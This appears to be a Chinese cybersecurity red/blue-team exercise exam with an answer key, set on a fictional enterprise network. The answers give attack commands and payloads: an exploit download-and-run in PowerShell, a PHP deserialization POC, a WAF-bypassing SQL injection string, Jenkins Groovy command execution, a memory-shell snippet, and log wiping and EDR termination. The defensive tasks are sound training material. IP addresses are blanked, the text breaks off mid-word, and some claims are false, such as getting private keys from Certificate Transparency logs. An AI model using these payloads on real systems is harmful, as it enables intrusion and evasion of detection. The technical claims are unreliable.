2025年網(wǎng)絡(luò)安全工程師攻防演練實(shí)操試題及答案一、演練環(huán)境搭建說明網(wǎng)絡(luò)拓?fù)洌耗称髽I(yè)內(nèi)網(wǎng)分為辦公區(qū)（/24）、開發(fā)測(cè)試區(qū)（/24）、數(shù)據(jù)庫(kù)區(qū)（/24），邊界部署F5負(fù)載均衡（0）、深信服WAF（0）、天融信防火墻（0）。辦公區(qū)有員工終端（Windows11Pro，補(bǔ)丁更新至2024年12月）、OA系統(tǒng)服務(wù)器（CentOS8.5，Apache2.4.57，PHP8.2.15）；開發(fā)測(cè)試區(qū)有Jenkins持續(xù)集成服務(wù)器（Ubuntu22.04，Jenkins2.426.2）、代碼倉(cāng)庫(kù)（GitLab16.10.3）；數(shù)據(jù)庫(kù)區(qū)部署MySQL8.0.35主從節(jié)點(diǎn)（0/11），啟用SSL加密。防守方基礎(chǔ)配置：-終端安裝深信服EDR（版本5.6.2），啟用進(jìn)程白名單、文件哈希校驗(yàn)；-服務(wù)器部署青藤云安全主機(jī)衛(wèi)士（版本3.8.1），開啟命令行審計(jì)、異常網(wǎng)絡(luò)連接阻斷；-日志集中至ElasticStack（7.17.12），保留30天；-防火墻策略：僅允許辦公區(qū)80/443訪問OA系統(tǒng)，開發(fā)測(cè)試區(qū)22/8080/443開放至辦公區(qū)，數(shù)據(jù)庫(kù)區(qū)僅允許開發(fā)測(cè)試區(qū)3306端口訪問。攻擊方權(quán)限：初始持有某離職員工弱口令（賬號(hào)：zhangsan，密碼：Zh@ngs@n2023），可登錄辦公區(qū)任意終端。二、攻擊方任務(wù)（總分70分）任務(wù)1：突破終端防御獲取本地權(quán)限（15分）要求：利用辦公區(qū)終端（IP：0）的初始權(quán)限，繞過EDR檢測(cè)，獲取SYSTEM權(quán)限。評(píng)分標(biāo)準(zhǔn)：-成功關(guān)閉/繞過EDR進(jìn)程防護(hù)（5分）；-利用本地提權(quán)漏洞獲取SYSTEM權(quán)限（10分，需提供具體漏洞編號(hào)及利用命令）。任務(wù)2：橫向移動(dòng)至OA系統(tǒng)服務(wù)器（20分）要求：從辦公區(qū)終端（0）滲透至OA系統(tǒng)服務(wù)器（0），需避開WAF及防火墻檢測(cè)。評(píng)分標(biāo)準(zhǔn)：-發(fā)現(xiàn)OA系統(tǒng)未公開的后臺(tái)路徑（如/admin.php）（5分）；-利用PHP反序列化漏洞（需寫出漏洞觸發(fā)點(diǎn)及POC）（10分）；-繞過WAF的SQL注入防護(hù)（5分，需提供繞過Payload）。任務(wù)3：入侵?jǐn)?shù)據(jù)庫(kù)區(qū)獲取敏感數(shù)據(jù)（25分）要求：從OA系統(tǒng)服務(wù)器橫向至Jenkins服務(wù)器（0），最終訪問MySQL主庫(kù)（0），導(dǎo)出用戶信息表（user_info）。評(píng)分標(biāo)準(zhǔn)：-利用Jenkins未授權(quán)訪問漏洞獲取系統(tǒng)權(quán)限（8分，需說明漏洞原理）；-通過內(nèi)存馬技術(shù)持久化控制Jenkins（7分，需提供關(guān)鍵命令）；-破解MySQL連接密碼（或獲取root權(quán)限）（5分）；-繞過SSL加密截獲數(shù)據(jù)庫(kù)流量（5分）。任務(wù)4：清除攻擊痕跡（10分）要求：刪除終端、OA服務(wù)器、Jenkins服務(wù)器的登錄日志、進(jìn)程記錄，避免被防守方溯源。評(píng)分標(biāo)準(zhǔn)：-清除Windows事件日志（3分）；-篡改Linuxauth.log及audit日志（4分）；-終止EDR/主機(jī)衛(wèi)士的異常進(jìn)程記錄（3分）。三、防守方任務(wù)（總分30分）任務(wù)1：實(shí)時(shí)監(jiān)測(cè)異常行為（10分）要求：通過日志分析與流量監(jiān)控，在攻擊方完成任務(wù)2前發(fā)現(xiàn)入侵跡象。評(píng)分標(biāo)準(zhǔn)：-從終端日志中識(shí)別EDR進(jìn)程異常終止事件（3分）；-通過WAF日志發(fā)現(xiàn)/admin.php高頻訪問（2分）；-檢測(cè)到PHP反序列化請(qǐng)求的特征（如O:4:"User":1:{s:4:"name";s:10:"phpinfo();"}）（5分）。任務(wù)2：阻斷橫向移動(dòng)（10分）要求：在攻擊方嘗試訪問Jenkins服務(wù)器時(shí)，通過動(dòng)態(tài)策略封禁攻擊源IP，并恢復(fù)被篡改的日志。評(píng)分標(biāo)準(zhǔn)：-基于Elasticsearch檢索到Jenkins未授權(quán)訪問的HTTP200響應(yīng)（4分）；-防火墻自動(dòng)封禁異常IP（3分）；-利用日志備份恢復(fù)被刪除的auth.log（3分）。任務(wù)3：數(shù)據(jù)泄露溯源與恢復(fù)（10分）要求：定位數(shù)據(jù)庫(kù)區(qū)敏感數(shù)據(jù)泄露路徑，恢復(fù)user_info表數(shù)據(jù)。評(píng)分標(biāo)準(zhǔn)：-分析MySQL慢查詢?nèi)罩?，發(fā)現(xiàn)未授權(quán)的SELECTFROMuser_info（4分）；-通過流量回溯確認(rèn)數(shù)據(jù)經(jīng)Jenkins服務(wù)器外傳（3分）；-利用MySQLbinlog或從庫(kù)恢復(fù)數(shù)據(jù)（3分）。四、參考答案及解析攻擊方任務(wù)1解析步驟1：繞過EDR檢測(cè)。EDR（深信服5.6.2）通過驅(qū)動(dòng)層監(jiān)控進(jìn)程創(chuàng)建，可通過加載未被檢測(cè)的無文件木馬（如利用MSHTML引擎的CVE-2024-0608漏洞），或使用“進(jìn)程注入”技術(shù)（如通過rundll32.exe加載惡意DLL，規(guī)避EDR的進(jìn)程白名單）。步驟2：本地提權(quán)。Windows112024年12月補(bǔ)丁未修復(fù)CVE-2024-2199（NTFS文件系統(tǒng)權(quán)限提升漏洞），利用exp：```powershell下載漏洞利用工具（需免殺處理）Invoke-WebRequest-Uri/cve-2024-2199.exe-OutFilec:\temp\exp.exe執(zhí)行后獲取SYSTEM權(quán)限c:\temp\exp.exe```攻擊方任務(wù)2解析步驟1：發(fā)現(xiàn)后臺(tái)路徑。通過掃描辦公區(qū)終端瀏覽器歷史記錄，找到OA系統(tǒng)臨時(shí)訪問鏈接（如/admin.php?token=abc123），確認(rèn)后臺(tái)路徑。步驟2：PHP反序列化漏洞。OA系統(tǒng)user類存在__wakeup()方法未校驗(yàn)權(quán)限，構(gòu)造POC：```phpO:4:"User":2:{s:4:"name";s:10:"system('id');";s:5:"admin";b:1;}```通過POST請(qǐng)求提交至/user/update.php，觸發(fā)命令執(zhí)行，獲取服務(wù)器shell。步驟3：繞過WAF。WAF規(guī)則攔截“UNIONSELECT”，可替換為“UNIóNSELéCT”（利用Unicode編碼）或“UNION//SELECT”（插入注釋），如：```sql?id=1'UNIóN//SELéCT1,version(),3--+```攻擊方任務(wù)3解析步驟1：Jenkins未授權(quán)訪問。Jenkins2.426.2未配置CSRF保護(hù)，直接訪問0/script，執(zhí)行Groovy腳本獲取系統(tǒng)權(quán)限：```groovyprintln"whoami".execute().text```步驟2：內(nèi)存馬植入。通過Jenkins的CLI接口加載惡意Java類到內(nèi)存，使用反射機(jī)制注冊(cè)Filter：```javaFilterfilter=newMaliciousFilter();FilterConfigconfig=newFilterConfig(){...};filter.init(config);```步驟3：破解MySQL密碼。OA服務(wù)器/web/conf/db.php中存在明文連接字符串（$db_pass="MySqL@2025"），直接獲取密碼；或通過pt-query-digest分析慢查詢?nèi)罩?，提取加密連接參數(shù)后爆破。步驟4：繞過SSL截獲流量。利用證書透明性（CT）日志獲取MySQL服務(wù)器證書私鑰（若未嚴(yán)格管理），或在Jenkins服務(wù)器部署中間人代理（如sslsplit），重定向3306端口流量并解密。攻擊方任務(wù)4解析Windows日志清除：使用wevtutil命令：```cmdwevtutilcl"Security"wevtutilcl"System"```Linux日志篡改：使用sed替換auth.log中的可疑IP：```bashsed-i's/0//g'/var/log/auth.log```終止EDR記錄：通過kill命令結(jié)束深信服EDR的監(jiān)控進(jìn)程（如edr_agent.exe的PID），或卸載驅(qū)動(dòng)（需SYSTEM權(quán)限）。防守方任務(wù)1解析EDR異常檢測(cè)：Elasticsearch查詢“process_name:edr_agent.exeANDevent:terminated”，發(fā)現(xiàn)非預(yù)期的進(jìn)程終止事件。WAF日志分析：WAF記錄中/admin.php的訪問頻率超過基線（正常為日均5次，攻擊時(shí)1分鐘內(nèi)10次），觸發(fā)告警。反序列化特征檢測(cè)：在Nginx訪問日志中搜索“User-Agent:curl”（攻擊方常用工具）+“Content-Type:application/x-www-form-urlencoded”+“O:4:”等關(guān)鍵字，聯(lián)動(dòng)WAF阻斷請(qǐng)求。防守方任務(wù)2解析Jenkins未授權(quán)訪問攔截：在Elasticsearch中配置告警規(guī)則：“url:/scriptANDstatus:200”，觸發(fā)后防火墻自動(dòng)封禁源IP（0）的22/8080端口訪問。日志恢復(fù)：通過rsync每日備份的日志文件（/backup/logs/auth.log-2025-03-10）覆蓋被篡改的當(dāng)前日志。防守方任務(wù)3解析數(shù)據(jù)泄露定位：MySQL慢查詢?nèi)罩局邪l(fā)現(xiàn)“SELEC